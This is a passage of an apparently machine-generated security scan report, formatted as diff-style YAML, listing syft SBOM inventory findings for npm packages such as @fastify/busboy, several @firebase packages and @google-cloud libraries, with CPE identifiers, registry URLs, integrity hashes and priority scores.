version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @fastify/busboy 3.2.0' + title: '@fastify/busboy 3.2.0' + description: 'Package discovered: @fastify/busboy 3.2.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: c1858ce75e8e8799 + name: '@fastify/busboy' + version: 3.2.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@fastify\/busboy:\@fastify\/busboy:3.2.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40fastify/busboy@3.2.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@fastify/busboy/-/busboy-3.2.0.tgz + integrity: sha512-m9FVDXU3GT2ITSe0UaMA5rU3QkfC/UXtCU8y0gSN/GugTqtVldOBWIB5V6V3sbmenVZUIpU6f+mPEO2+m5iTaA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 81749876eac20ae8 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @firebase/app-check-interop-types 0.3.2' + title: '@firebase/app-check-interop-types 0.3.2' + description: 'Package discovered: @firebase/app-check-interop-types 0.3.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 71780c9abc78bb02 + name: '@firebase/app-check-interop-types' + version: 0.3.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@firebase\/app-check-interop-types:\@firebase\/app-check-interop-types:0.3.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@firebase\/app-check-interop-types:\@firebase\/app_check_interop_types:0.3.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@firebase\/app_check_interop_types:\@firebase\/app-check-interop-types:0.3.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@firebase\/app_check_interop_types:\@firebase\/app_check_interop_types:0.3.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@firebase\/app-check-interop:\@firebase\/app-check-interop-types:0.3.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@firebase\/app-check-interop:\@firebase\/app_check_interop_types:0.3.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@firebase\/app_check_interop:\@firebase\/app-check-interop-types:0.3.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@firebase\/app_check_interop:\@firebase\/app_check_interop_types:0.3.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@firebase\/app-check:\@firebase\/app-check-interop-types:0.3.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@firebase\/app-check:\@firebase\/app_check_interop_types:0.3.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@firebase\/app_check:\@firebase\/app-check-interop-types:0.3.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@firebase\/app_check:\@firebase\/app_check_interop_types:0.3.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@firebase\/app:\@firebase\/app-check-interop-types:0.3.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@firebase\/app:\@firebase\/app_check_interop_types:0.3.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40firebase/app-check-interop-types@0.3.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@firebase/app-check-interop-types/-/app-check-interop-types-0.3.2.tgz + integrity: sha512-LMs47Vinv2HBMZi49C09dJxp0QT5LwDzFaVGf/+ITHe3BlIhUiLNttkATSXplc89A2lAaeTqjgqVkiRfUGyQiQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: efa61bee7bbbbcb1 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @firebase/app-types 0.9.2' + title: '@firebase/app-types 0.9.2' + description: 'Package discovered: @firebase/app-types 0.9.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: a5bfafbacd41f0a2 + name: '@firebase/app-types' + version: 0.9.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@firebase\/app-types:\@firebase\/app-types:0.9.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@firebase\/app-types:\@firebase\/app_types:0.9.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@firebase\/app_types:\@firebase\/app-types:0.9.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@firebase\/app_types:\@firebase\/app_types:0.9.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@firebase\/app:\@firebase\/app-types:0.9.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@firebase\/app:\@firebase\/app_types:0.9.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40firebase/app-types@0.9.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@firebase/app-types/-/app-types-0.9.2.tgz + integrity: sha512-oMEZ1TDlBz479lmABwWsWjzHwheQKiAgnuKxE0pz0IXCVx7/rtlkx1fQ6GfgK24WCrxDKMplZrT50Kh04iMbXQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 222f117f0d2bd962 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @firebase/auth-interop-types 0.2.3' + title: '@firebase/auth-interop-types 0.2.3' + description: 'Package discovered: @firebase/auth-interop-types 0.2.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 9b3141b15843b5a9 + name: '@firebase/auth-interop-types' + version: 0.2.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@firebase\/auth-interop-types:\@firebase\/auth-interop-types:0.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@firebase\/auth-interop-types:\@firebase\/auth_interop_types:0.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@firebase\/auth_interop_types:\@firebase\/auth-interop-types:0.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@firebase\/auth_interop_types:\@firebase\/auth_interop_types:0.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@firebase\/auth-interop:\@firebase\/auth-interop-types:0.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@firebase\/auth-interop:\@firebase\/auth_interop_types:0.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@firebase\/auth_interop:\@firebase\/auth-interop-types:0.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@firebase\/auth_interop:\@firebase\/auth_interop_types:0.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@firebase\/auth:\@firebase\/auth-interop-types:0.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@firebase\/auth:\@firebase\/auth_interop_types:0.2.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40firebase/auth-interop-types@0.2.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@firebase/auth-interop-types/-/auth-interop-types-0.2.3.tgz + integrity: sha512-Fc9wuJGgxoxQeavybiuwgyi+0rssr76b+nHpj+eGhXFYAdudMWyfBHvFL/I5fEHniUM/UQdFzi9VXJK2iZF7FQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 89a01c3b3491a5d7 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @firebase/component 0.6.9' + title: '@firebase/component 0.6.9' + description: 'Package discovered: @firebase/component 0.6.9' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 23f944b79804e251 + name: '@firebase/component' + version: 0.6.9 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@firebase\/component:\@firebase\/component:0.6.9:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40firebase/component@0.6.9 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@firebase/component/-/component-0.6.9.tgz + integrity: sha512-gm8EUEJE/fEac86AvHn8Z/QW8BvR56TBw3hMW0O838J/1mThYQXAIQBgUv75EqlCZfdawpWLrKt1uXvp9ciK3Q== + dependencies: + '@firebase/util': 1.10.0 + tslib: ^2.1.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: ac38e7507aa172f9 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @firebase/database 1.0.8' + title: '@firebase/database 1.0.8' + description: 'Package discovered: @firebase/database 1.0.8' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 49e5593cb4d5046f + name: '@firebase/database' + version: 1.0.8 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@firebase\/database:\@firebase\/database:1.0.8:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40firebase/database@1.0.8 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@firebase/database/-/database-1.0.8.tgz + integrity: sha512-dzXALZeBI1U5TXt6619cv0+tgEhJiwlUtQ55WNZY7vGAjv7Q1QioV969iYwt1AQQ0ovHnEW0YW9TiBfefLvErg== + dependencies: + '@firebase/app-check-interop-types': 0.3.2 + '@firebase/auth-interop-types': 0.2.3 + '@firebase/component': 0.6.9 + '@firebase/logger': 0.4.2 + '@firebase/util': 1.10.0 + faye-websocket: 0.11.4 + tslib: ^2.1.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: ed006e6af38f061f + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @firebase/database-compat 1.0.8' + title: '@firebase/database-compat 1.0.8' + description: 'Package discovered: @firebase/database-compat 1.0.8' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 2a2bae4730b1aafc + name: '@firebase/database-compat' + version: 1.0.8 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@firebase\/database-compat:\@firebase\/database-compat:1.0.8:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@firebase\/database-compat:\@firebase\/database_compat:1.0.8:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@firebase\/database_compat:\@firebase\/database-compat:1.0.8:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@firebase\/database_compat:\@firebase\/database_compat:1.0.8:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@firebase\/database:\@firebase\/database-compat:1.0.8:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@firebase\/database:\@firebase\/database_compat:1.0.8:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40firebase/database-compat@1.0.8 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@firebase/database-compat/-/database-compat-1.0.8.tgz + integrity: sha512-OpeWZoPE3sGIRPBKYnW9wLad25RaWbGyk7fFQe4xnJQKRzlynWeFBSRRAoLE2Old01WXwskUiucNqUUVlFsceg== + dependencies: + '@firebase/component': 0.6.9 + '@firebase/database': 1.0.8 + '@firebase/database-types': 1.0.5 + '@firebase/logger': 0.4.2 + '@firebase/util': 1.10.0 + tslib: ^2.1.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 04162de267eec152 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @firebase/database-types 1.0.5' + title: '@firebase/database-types 1.0.5' + description: 'Package discovered: @firebase/database-types 1.0.5' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 67e400eb3f7a92f4 + name: '@firebase/database-types' + version: 1.0.5 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@firebase\/database-types:\@firebase\/database-types:1.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@firebase\/database-types:\@firebase\/database_types:1.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@firebase\/database_types:\@firebase\/database-types:1.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@firebase\/database_types:\@firebase\/database_types:1.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@firebase\/database:\@firebase\/database-types:1.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@firebase\/database:\@firebase\/database_types:1.0.5:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40firebase/database-types@1.0.5 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@firebase/database-types/-/database-types-1.0.5.tgz + integrity: sha512-fTlqCNwFYyq/C6W7AJ5OCuq5CeZuBEsEwptnVxlNPkWCo5cTTyukzAHRSO/jaQcItz33FfYrrFk1SJofcu2AaQ== + dependencies: + '@firebase/app-types': 0.9.2 + '@firebase/util': 1.10.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 7028a090c3339aad + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @firebase/logger 0.4.2' + title: '@firebase/logger 0.4.2' + description: 'Package discovered: @firebase/logger 0.4.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: fdb02e46c7ca0cd4 + name: '@firebase/logger' + version: 0.4.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@firebase\/logger:\@firebase\/logger:0.4.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40firebase/logger@0.4.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@firebase/logger/-/logger-0.4.2.tgz + integrity: sha512-Q1VuA5M1Gjqrwom6I6NUU4lQXdo9IAQieXlujeHZWvRt1b7qQ0KwBaNAjgxG27jgF9/mUwsNmO8ptBCGVYhB0A== + dependencies: + tslib: ^2.1.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 98e9db7b5ca2c98a + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @firebase/util 1.10.0' + title: '@firebase/util 1.10.0' + description: 'Package discovered: @firebase/util 1.10.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 6fc2f98e01b8bb45 + name: '@firebase/util' + version: 1.10.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:google:firebase\/util:1.10.0:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/%40firebase/util@1.10.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@firebase/util/-/util-1.10.0.tgz + integrity: sha512-xKtx4A668icQqoANRxyDLBLz51TAbDP9KRfpbKGxiCAW346d0BeJe5vN6/hKxxmWwnZ0mautyv39JxviwwQMOQ== + dependencies: + tslib: ^2.1.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: ac959c0aec00c93e + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @google-cloud/firestore 7.11.6' + title: '@google-cloud/firestore 7.11.6' + description: 'Package discovered: @google-cloud/firestore 7.11.6' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 352073d173d9984f + name: '@google-cloud/firestore' + version: 7.11.6 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:google:cloud_firestore:7.11.6:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/%40google-cloud/firestore@7.11.6 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@google-cloud/firestore/-/firestore-7.11.6.tgz + integrity: sha512-EW/O8ktzwLfyWBOsNuhRoMi8lrC3clHM5LVFhGvO1HCsLozCOOXRAlHrYBoE6HL42Sc8yYMuCb2XqcnJ4OOEpw== + dependencies: + '@opentelemetry/api': ^1.3.0 + fast-deep-equal: ^3.1.1 + functional-red-black-tree: ^1.0.1 + google-gax: ^4.3.3 + protobufjs: ^7.2.6 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: f729f15026a15114 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @google-cloud/paginator 5.0.2' + title: '@google-cloud/paginator 5.0.2' + description: 'Package discovered: @google-cloud/paginator 5.0.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: e1f90862acd15bdd + name: '@google-cloud/paginator' + version: 5.0.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@google-cloud\/paginator:\@google-cloud\/paginator:5.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@google-cloud\/paginator:\@google_cloud\/paginator:5.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@google_cloud\/paginator:\@google-cloud\/paginator:5.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@google_cloud\/paginator:\@google_cloud\/paginator:5.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@google:\@google-cloud\/paginator:5.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@google:\@google_cloud\/paginator:5.0.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40google-cloud/paginator@5.0.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@google-cloud/paginator/-/paginator-5.0.2.tgz + integrity: sha512-DJS3s0OVH4zFDB1PzjxAsHqJT6sKVbRwwML0ZBP9PbU7Yebtu/7SWMRzvO2J3nUi9pRNITCfu4LJeooM2w4pjg== + dependencies: + arrify: ^2.0.0 + extend: ^3.0.2 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 13de8663f3cca980 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @google-cloud/projectify 4.0.0' + title: '@google-cloud/projectify 4.0.0' + description: 'Package discovered: @google-cloud/projectify 4.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: aae37aa20c3046f6 + name: '@google-cloud/projectify' + version: 4.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@google-cloud\/projectify:\@google-cloud\/projectify:4.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@google-cloud\/projectify:\@google_cloud\/projectify:4.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@google_cloud\/projectify:\@google-cloud\/projectify:4.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@google_cloud\/projectify:\@google_cloud\/projectify:4.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@google:\@google-cloud\/projectify:4.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@google:\@google_cloud\/projectify:4.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40google-cloud/projectify@4.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@google-cloud/projectify/-/projectify-4.0.0.tgz + integrity: sha512-MmaX6HeSvyPbWGwFq7mXdo0uQZLGBYCwziiLIGq5JVX+/bdI3SAq6bP98trV5eTWfLuvsMcIC1YJOF2vfteLFA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: f473f0a74b429a34 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @google-cloud/promisify 4.0.0' + title: '@google-cloud/promisify 4.0.0' + description: 'Package discovered: @google-cloud/promisify 4.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 3927becf19e34873 + name: '@google-cloud/promisify' + version: 4.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@google-cloud\/promisify:\@google-cloud\/promisify:4.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@google-cloud\/promisify:\@google_cloud\/promisify:4.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@google_cloud\/promisify:\@google-cloud\/promisify:4.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: 